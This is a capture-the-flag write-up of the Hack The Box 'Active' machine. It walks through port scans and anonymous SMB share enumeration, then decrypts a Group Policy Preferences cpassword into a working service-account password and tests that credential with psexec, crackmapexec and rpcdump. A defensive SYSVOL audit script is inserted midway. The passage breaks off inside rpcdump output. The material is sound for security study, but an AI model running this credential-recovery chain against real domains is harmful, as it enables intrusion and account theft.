Active-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous SMB access, the Windows Server 2008 Group Policy Preferences (GPP) vulnerability, Kerberoasting

Reference links:

0x01 Obtaining user privileges

1. Get the target machine's IP address: 10.10.10.100

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ nmap -p- --min-rate 10000 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 22:18 CST
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.31s latency).
Not shown: 39775 filtered tcp ports (no-response), 25748 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
49152/tcp open unknown
49153/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49171/tcp open unknown

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -sU --min-rate 10000 10.10.10.100
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 22:30 CST
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.51s latency).
Not shown: 65473 open|filtered udp ports (no-response), 59 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp

Nmap done: 1 IP address (1 host up) scanned in 77.96 seconds

3. Use smbclient to look at what port 445 offers

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L \\10.10.10.100 -N
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

4. Use smbmap to see which SMB shares are accessible

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.100

-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS

5. Check whether the readable Replication share contains anything sensitive

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
active.htb D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 219817 blocks available
smb: \> cd active.htb
smb: \active.htb\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 18:37:44 2018
Policies D 0 Sat Jul 21 18:37:44 2018
scripts D 0 Thu Jul 19 02:48:57 2018

5217023 blocks of size 4096. 210953 blocks available
smb: \active.htb\> cd DfsrPrivate
smb: \active.htb\DfsrPrivate\> ls
. DHS 0 Sat Jul 21 18:37:44 2018
.. DHS 0 Sat Jul 21 18:37:44 2018
ConflictAndDeleted D 0 Thu Jul 19 02:51:30 2018
Deleted D 0 Thu Jul 19 02:51:30 2018
Installing D 0 Thu Jul 19 02:51:30 2018

5217023 blocks of size 4096. 205087 blocks available
smb: \active.htb\DfsrPrivate\> cd ConflictAndDeleted
smb: \active.htb\DfsrPrivate\ConflictAndDeleted\> ls
. D 0 Thu Jul 19 02:51:30 2018
.. D 0 Thu Jul 19 02:51:30 2018

5217023 blocks of size 4096. 196743 blocks available
smb: \active.htb\DfsrPrivate\ConflictAndDeleted\> cd ../
smb: \active.htb\DfsrPrivate\> cd Deleted
smb: \active.htb\DfsrPrivate\Deleted\> ls
. D 0 Thu Jul 19 02:51:30 2018
.. D 0 Thu Jul 19 02:51:30 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\DfsrPrivate\Deleted\> cd ../
smb: \active.htb\DfsrPrivate\> cd Installing
smb: \active.htb\DfsrPrivate\Installing\> ls
. D 0 Thu Jul 19 02:51:30 2018
.. D 0 Thu Jul 19 02:51:30 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\DfsrPrivate\Installing\> cd ../../
smb: \active.htb\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 18:37:44 2018
Policies D 0 Sat Jul 21 18:37:44 2018
scripts D 0 Thu Jul 19 02:48:57 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 18:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
GPT.INI A 23 Thu Jul 19 04:46:06 2018
Group Policy D 0 Sat Jul 21 18:37:44 2018
MACHINE D 0 Sat Jul 21 18:37:44 2018
USER D 0 Thu Jul 19 02:49:12 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cat GPT.INI
cat: command not found
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> type GPT.INI
type: command not found
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> get GPT.INI
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd Group Policy
cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
GPT.INI A 23 Thu Jul 19 04:46:06 2018
Group Policy D 0 Sat Jul 21 18:37:44 2018
MACHINE D 0 Sat Jul 21 18:37:44 2018
USER D 0 Thu Jul 19 02:49:12 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd Group Policy/
cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Microsoft D 0 Sat Jul 21 18:37:44 2018
Preferences D 0 Sat Jul 21 18:37:44 2018
Registry.pol A 2788 Thu Jul 19 02:53:45 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Microsoft
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Windows NT D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\> cd ../
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups.xml A 533 Thu Jul 19 04:46:06 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups.xml A 533 Thu Jul 19 04:46:06 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> cd ../../
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Microsoft D 0 Sat Jul 21 18:37:44 2018
Preferences D 0 Sat Jul 21 18:37:44 2018
Registry.pol A 2788 Thu Jul 19 02:53:45 2018

5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> get Registry.pol
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (1.6 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd ../
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
GPT.INI A 23 Thu Jul 19 04:46:06 2018
Group Policy D 0 Sat Jul 21 18:37:44 2018
MACHINE D 0 Sat Jul 21 18:37:44 2018
USER D 0 Thu Jul 19 02:49:12 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
. D 0 Thu Jul 19 02:49:12 2018
.. D 0 Thu Jul 19 02:49:12 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd ../../
smb: \active.htb\Policies\>
smb: \active.htb\Policies\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 18:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\> cd {6AC1786C-016F-11D2-945F-00C04fB984F9}
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
GPT.INI A 22 Thu Jul 19 02:49:12 2018
MACHINE D 0 Sat Jul 21 18:37:44 2018
USER D 0 Thu Jul 19 02:49:12 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> cd MACHINE
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Microsoft D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> cd Microsoft
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Windows NT D 0 Sat Jul 21 18:37:44 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> cd Windows NT
cd \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> cd ../../
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> cd USER
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER\> ls
. D 0 Thu Jul 19 02:49:12 2018
.. D 0 Thu Jul 19 02:49:12 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER\>
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER\> cd ../../../
smb: \active.htb\> ls
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 18:37:44 2018
Policies D 0 Sat Jul 21 18:37:44 2018
scripts D 0 Thu Jul 19 02:48:57 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\> cd scripts
smb: \active.htb\scripts\> ls
. D 0 Thu Jul 19 02:48:57 2018
.. D 0 Thu Jul 19 02:48:57 2018

5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\scripts\>

6. The Groups.xml file retrieved above turns out to contain some useful information

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

7. The important parts are the account name and the encrypted password

name="active.htb\SVC_TGS" 

cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

8. Next, add a local hosts entry for the domain name

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.100 active.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.100 active.htb

9. An experienced tester will recognise from the .xml above that this is the Windows Server 2008 Group Policy Preferences (GPP) vulnerability

10. To decrypt the value, one option is the Python script referenced above, but I could not get it to run, so I used the decryption tool that ships with Kali, gpp-decrypt

┌──(kali㉿offsec)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
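The defender-side counterpart of steps 5 to 10, as an added example that is not part of the original writeup: a standard-library Python audit that walks a Policies tree (as pulled from SYSVOL or, here, the Replication share) and reports every Group Policy Preference file that still carries a cpassword attribute. The Groups.xml text is the one retrieved above; the Drives.xml and Services.xml files, their account names, and the temporary directory layout are constructed for this example.

```python
"""Audit a SYSVOL Policies tree for Group Policy Preference XML files that
still carry a cpassword attribute (the GPP weakness used in this writeup).

Standard library only. SAMPLE_GROUPS_XML is the Groups.xml retrieved in the
writeup; the Drives.xml and Services.xml texts are constructed to show a
clean file and a second preference type, and the directory tree is built in
a temporary folder so the script runs offline.
"""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference file types documented by Microsoft as able to store a credential.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes that name the account a cpassword belongs to (varies per file type).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Groups.xml exactly as retrieved from the Replication share in the writeup.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
"""
# Constructed: a mapped drive with no stored credential (must not be flagged).
SAMPLE_DRIVES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Drives><Drive name="H:" status="H:"><Properties action="U" path="\\fileserver\home" label="Home" userName="" persistent="1" letter="H"/></Drive></Drives>
"""
# Constructed: a service preference with a placeholder cpassword (must be flagged).
SAMPLE_SERVICES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<NTServices><NTService name="BackupAgent"><Properties startupType="AUTOMATIC" serviceName="BackupAgent" accountName="active.htb\svc_backup" cpassword="CONSTRUCTED-PLACEHOLDER"/></NTService></NTServices>
"""


def find_cpasswords(policies_root: Path) -> list:
    """Return one finding per non-empty cpassword attribute under policies_root."""
    findings = []
    for path in sorted(policies_root.rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            root = ET.parse(path).getroot()
        except ET.ParseError:
            continue  # not well-formed XML, so not a preference file we can judge
        # ElementTree has no parent pointers; build the map once per file.
        parents = {child: parent for parent in root.iter() for child in parent}
        for elem in root.iter():
            cpassword = elem.get("cpassword")
            if not cpassword:
                continue
            account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
            if account is None:  # fall back to the enclosing item's name
                account = parents.get(elem, elem).get("name", "<unknown>")
            rel = path.relative_to(policies_root)
            findings.append({
                "file": rel.as_posix(),
                "gpo": next((p for p in rel.parts if p.startswith("{")), "<none>"),
                "scope": "MACHINE" if "MACHINE" in rel.parts else "USER",
                "element": parents.get(elem, elem).tag,
                "account": account,
                "cpassword_len": len(cpassword),
            })
    return findings


def build_sample_tree(base: Path) -> Path:
    """Lay the sample files out under the GPO path seen in the writeup."""
    policies = base / "active.htb" / "Policies"
    prefs = policies / "{31B2F340-016D-11D2-945F-00C04FB984F9}" / "MACHINE" / "Preferences"
    for folder, text in (("Groups", SAMPLE_GROUPS_XML), ("Drives", SAMPLE_DRIVES_XML),
                         ("Services", SAMPLE_SERVICES_XML)):
        (prefs / folder).mkdir(parents=True, exist_ok=True)
        (prefs / folder / f"{folder}.xml").write_text(text, encoding="utf-8")
    return policies


def audit_sample() -> list:
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_cpasswords(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for f in audit_sample():
        print(f"[!] {f['gpo']} {f['scope']} {f['file']}: <{f['element']}> "
              f"account={f['account']} has a cpassword ({f['cpassword_len']} chars)")
```

Point find_cpasswords() at a copy of \\<dc>\SYSVOL\<domain>\Policies to run it against a real domain; any finding means the preference item must be removed and the account's password rotated, since the value is recoverable by anyone who can read SYSVOL.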

11. Because this account has no write access to any share, psexec cannot be used for command execution

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec SVC_TGS@10.10.10.100
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.100.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

12. crackmapexec confirms the same thing

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing RDP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.100 445 NONE [*] x64 (name:) (domain:) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 NONE [+] \SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 NONE [+] Enumerated shares
SMB 10.10.10.100 445 NONE Share Permissions Remark
SMB 10.10.10.100 445 NONE ----- ----------- ------
SMB 10.10.10.100 445 NONE ADMIN$ Remote Admin
SMB 10.10.10.100 445 NONE C$ Default share
SMB 10.10.10.100 445 NONE IPC$ Remote IPC
SMB 10.10.10.100 445 NONE NETLOGON READ Logon server share
SMB 10.10.10.100 445 NONE Replication READ
SMB 10.10.10.100 445 NONE SYSVOL READ Logon server share
SMB 10.10.10.100 445 NONE Users READ

13. Still learning as I go, I also used this account to enumerate the RPC endpoints

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-rpcdump active.htb\SVC_TGS:GPPstillStandingStrong2k18@10.10.10.100
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Retrieving endpoint list from 10.10.10.100
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
ncacn_ip_tcp:10.10.10.100[49152]
ncalrpc:[WindowsShutdown]
ncacn_np:\\DC[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc08B540]

Protocol: N/A
Provider: winlogon.exe
UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
ncalrpc:[WindowsShutdown]
ncacn_np:\\DC[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc08B540]
ncalrpc:[WMsgKRpc08B841]

Protocol: N/A
Provider: sysntfy.dll
UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings:
ncalrpc:[LRPC-b86370a004c1f5e7e0]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]
ncalrpc:[IUserProfile2]
ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: dhcpcsvc6.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc6]
ncalrpc:[dhcpcsvc]
ncacn_ip_tcp:10.10.10.100[49153]
ncacn_np:\\DC[\pipe\eventlog]
ncalrpc:[eventlog]

Protocol: N/A
Provider: dhcpcsvc.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc]
ncacn_ip_tcp:10.10.10.100[49153]
ncacn_np:\\DC[\pipe\eventlog]
ncalrpc:[eventlog]

Protocol: N/A
Provider: nrpsrv.dll
UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
ncacn_ip_tcp:10.10.10.100[49153]
ncacn_np:\\DC[\pipe\eventlog]
ncalrpc:[eventlog]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
ncacn_ip_tcp:10.10.10.100[49153]
ncacn_np:\\DC[\pipe\eventlog]
ncalrpc:[eventlog]

Protocol: N/A
Provider: iphlpsvc.dll
UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings:
ncacn_np:\\DC[\PIPE\srvsvc]
ncacn_ip_tcp:10.10.10.100[49154]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: IKEEXT.DLL
UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings:
ncacn_np:\\DC[\PIPE\srvsvc]
ncacn_ip_tcp:10.10.10.100[49154]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: srvsvc.dll
UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
ncacn_ip_tcp:10.10.10.100[49154]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
ncacn_ip_tcp:10.10.10.100[49154]
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
ncacn_np:\\DC[\PIPE\atsvc]
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: schedsvc.dll
UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
ncalrpc:[senssvc]
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: gpsvc.dll
UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0
Bindings:
ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: authui.dll
UUID : 24019106-A203-4642-B88D-82DAE9158929 v1.0
Bindings:
ncalrpc:[LRPC-02d691a518757df2ee]

Protocol: N/A
Provider: N/A
UUID : 3473DD4D-2E88-4006-9CBA-22570909DD10 v5.1 WinHttp Auto-Proxy Service
Bindings:
ncacn_np:\\DC[\PIPE\W32TIME_ALT]
ncalrpc:[W32TIME_ALT]
ncalrpc:[LRPC-ad268f2e1611d88c77]
ncalrpc:[OLEC2F5065216764A74AD990E0A0C1C]

Protocol: N/A
Provider: nsisvc.dll
UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings:
ncalrpc:[LRPC-ad268f2e1611d88c77]
ncalrpc:[OLEC2F5065216764A74AD990E0A0C1C]

Protocol: N/A
Provider: MPSSVC.dll
UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-31485e4410b15e855e]

Protocol: N/A
Provider: MPSSVC.dll
UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-31485e4410b15e855e]

Protocol: N/A
Provider: BFE.DLL
